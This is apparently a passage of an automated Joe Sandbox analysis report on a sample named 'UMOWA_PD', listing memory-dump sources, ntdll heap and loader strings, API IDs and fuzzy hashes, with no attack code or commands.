                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                    • API String ID: 0-1391187441
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                    • API String ID: 0-1168191160
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33C914B6
                                                                                    • HEAP[%wZ]: , xrefs: 33C91632
                                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33C91648
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                    • API String ID: 0-3178619729
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 33D000C7
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 33D000F1
                                                                                    • RTL: Re-Waiting, xrefs: 33D00128
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                    • API String ID: 0-1145731471
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                    • API String ID: 0-373624363
                                                                                    Strings
                                                                                    • TargetNtPath, xrefs: 33D6B3AF
                                                                                    • GlobalizationUserSettings, xrefs: 33D6B3B4
                                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 33D6B3AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                    • API String ID: 0-505981995
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33CEE442
                                                                                    • HEAP[%wZ]: , xrefs: 33CEE435
                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 33CEE455
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                    • API String ID: 0-1340214556
                                                                                    Strings
                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 33CFA396
                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 33CFA3A7
                                                                                    • LdrpCompleteMapModule, xrefs: 33CFA39D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                    • API String ID: 0-1676968949
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33D3D79F
                                                                                    • HEAP[%wZ]: , xrefs: 33D3D792
                                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 33D3D7B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                    • API String ID: 0-3815128232
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                    • API String ID: 0-1151232445
                                                                                    Strings
                                                                                    • LdrpAllocateTls, xrefs: 33D0194A
                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 33D01954
                                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33D01943
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                    • API String ID: 0-4274184382
                                                                                    Strings
                                                                                    • RtlCreateActivationContext, xrefs: 33D02803
                                                                                    • Actx , xrefs: 33CC32CC
                                                                                    • SXS: %s() passed the empty activation context data, xrefs: 33D02808
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                    • API String ID: 0-859632880
                                                                                    Strings
                                                                                    • GlobalFlag, xrefs: 33D1B30F
                                                                                    • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 33D1B2B2
                                                                                    • @, xrefs: 33D1B2F0
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                    • API String ID: 0-4192008846
                                                                                    Strings
                                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 33D0184A
                                                                                    • LdrpInitializeTls, xrefs: 33D01851
                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 33D0185B
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                    • API String ID: 0-931879808
                                                                                    Strings
                                                                                    • @, xrefs: 33CD11C5
                                                                                    • BuildLabEx, xrefs: 33CD122F
                                                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 33CD119B
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                    • API String ID: 0-3051831665
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 33D185DE
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@
                                                                                    • API String ID: 0-149943524
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    Strings
                                                                                    • RedirectedKey, xrefs: 33D6B60E
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 33D6B5C4
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                    • API String ID: 0-1388552009
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$
                                                                                    • API String ID: 3446177414-233714265
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 33C9A229
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 33C9A21B
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                    • API String ID: 0-118005554
                                                                                    Strings
                                                                                    • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 33D0289F
                                                                                    • RtlpInitializeAssemblyStorageMap, xrefs: 33D0289A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #%u
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: 3aaba816e47bce06f545486f7f4c563195b480507409446b1faa4756dbcb596e
                                                                                    • Instruction ID: 3e80485c89baf7ad346374df1c0c022a4e835e533bee3ed01568f67afd5cba82
                                                                                    • Opcode Fuzzy Hash: 3aaba816e47bce06f545486f7f4c563195b480507409446b1faa4756dbcb596e
                                                                                    • Instruction Fuzzy Hash: F64133B1D0062DABDB21DA60DC84FDEB77CEB44714F0145E5E609AB150DB709E898FA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Flst
                                                                                    • API String ID: 0-2374792617
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 3Gw3Gw
                                                                                    • API String ID: 3446177414-644730685
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    • Instruction ID: 908f165b60caec3527130dcaf1fa249373dcce8c25e43bed5a9c86308d985e7a
                                                                                    • Opcode Fuzzy Hash: afe8bda1ccd32a5cc7138f7513e8d33a381c44c07c8423b43fd80af7fe98276c
                                                                                    • Instruction Fuzzy Hash: FD914476E01716CBEB109B7DC880B6EB7B5EF84750F0940A6E940DF6A0EB34D941CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ccd96ab8731c11fa1e29e0273605813e6cce6caf43b5347a5e80477da090c572
                                                                                    • Instruction ID: 4c70080561b3eb8dee861db992a8293248646ba3898f01cdcd8693b15e02bab1
                                                                                    • Opcode Fuzzy Hash: ccd96ab8731c11fa1e29e0273605813e6cce6caf43b5347a5e80477da090c572
                                                                                    • Instruction Fuzzy Hash: 1EB159B9900705CFEB16DF69D480AE9B7F4BF48354F5A815AD821DF292DB31D882CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fab132638d40985f57ba8a44dbb631c3ec2a31508324a2bb19211dc6891858cb
                                                                                    • Instruction ID: 573f0c856d6b652a0564a164a766d5821a7d154f58dbf0e9bebbc29d4ce16453
                                                                                    • Opcode Fuzzy Hash: fab132638d40985f57ba8a44dbb631c3ec2a31508324a2bb19211dc6891858cb
                                                                                    • Instruction Fuzzy Hash: 8AA14475A09742CFE304CF29C480A5ABBE9FF88744F16496EF584DB650EB30E945CB92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                    • Instruction ID: 56a5a1dc52bf350a4c41b0a278e63f31c273b86b0c7d61d7e8d9a73b868746d2
                                                                                    • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                    • Instruction Fuzzy Hash: D471C275E0021A9BDB00CF56C490AAFB7F9AF64B80F99411AD8C1EB244FB74D945C7A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                    • Instruction ID: 06c6383c5668dc2adc15de3e0fbc5292093831235294df2833208c2054cc5c7f
                                                                                    • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                    • Instruction Fuzzy Hash: 66818375A003299FEF09CF58C890AAEB7F6FF84350F198169E8559B354DB74E902CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: abb059981a6c1aff20cff083765eee948483e9ff5747f66c43020c1f58c52b31
                                                                                    • Instruction ID: e49728e6ab5b64843aa33f74c3b7b940df426443f3389fa7652b54d8465dc8ad
                                                                                    • Opcode Fuzzy Hash: abb059981a6c1aff20cff083765eee948483e9ff5747f66c43020c1f58c52b31
                                                                                    • Instruction Fuzzy Hash: 71815771A00749AFEB11CFA8C880BDEB7FAFF88755F144429E555E7220DB30A846CB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c31f487fc734fa4b5d410454130f0ecc03da7e353e89718afd6bc2b938560976
                                                                                    • Instruction ID: 9b8bbe113e472f25977132ff5803a7b8b2247150046039901b3118f01ec6e28e
                                                                                    • Opcode Fuzzy Hash: c31f487fc734fa4b5d410454130f0ecc03da7e353e89718afd6bc2b938560976
                                                                                    • Instruction Fuzzy Hash: 6C61B5B4F013199BFF15CF64C880BAE7BAAAF84B54F584159F852A7284DB30DD41CBA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f5efe73f08a62d8270367708d41f03655a614731774884024249bead6f40475
                                                                                    • Instruction ID: ad8d9458f2e78ee1a1890e006d22160d153660d951cac411e295f84b3b6d3d0e
                                                                                    • Opcode Fuzzy Hash: 2f5efe73f08a62d8270367708d41f03655a614731774884024249bead6f40475
                                                                                    • Instruction Fuzzy Hash: ED71CDB5C057299BDB21CF5DC9906AEBBF4FF48711F14816AE891EB380DB359811CBA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ac4ea027b8446dfa029c16cb4bada090a6be456a2bb8b69aee2898658d51ebe
                                                                                    • Instruction ID: c73fe54202ac38379952f644be01230d85d3bd9dee4aa51318dfe92434d6b30b
                                                                                    • Opcode Fuzzy Hash: 4ac4ea027b8446dfa029c16cb4bada090a6be456a2bb8b69aee2898658d51ebe
                                                                                    • Instruction Fuzzy Hash: 4A71CD35A047528FD301DF28C890B66B7E9FF84304F0985AAE898CF751EB34D955CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d90bdc7d19a6c8a5cf602ef7d7f6b8eb3d47aa11af0e3208420fd28609fa5e3c
                                                                                    • Instruction ID: b337c8f7ee58aa7e0fe1b221e68e96581c56bc70dd4589a1fd0eccbf6c6c20d2
                                                                                    • Opcode Fuzzy Hash: d90bdc7d19a6c8a5cf602ef7d7f6b8eb3d47aa11af0e3208420fd28609fa5e3c
                                                                                    • Instruction Fuzzy Hash: 64518875A09301CFE314CF29C480A1ABBE9FB88744F56496EF698DB714DB30E844CB82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
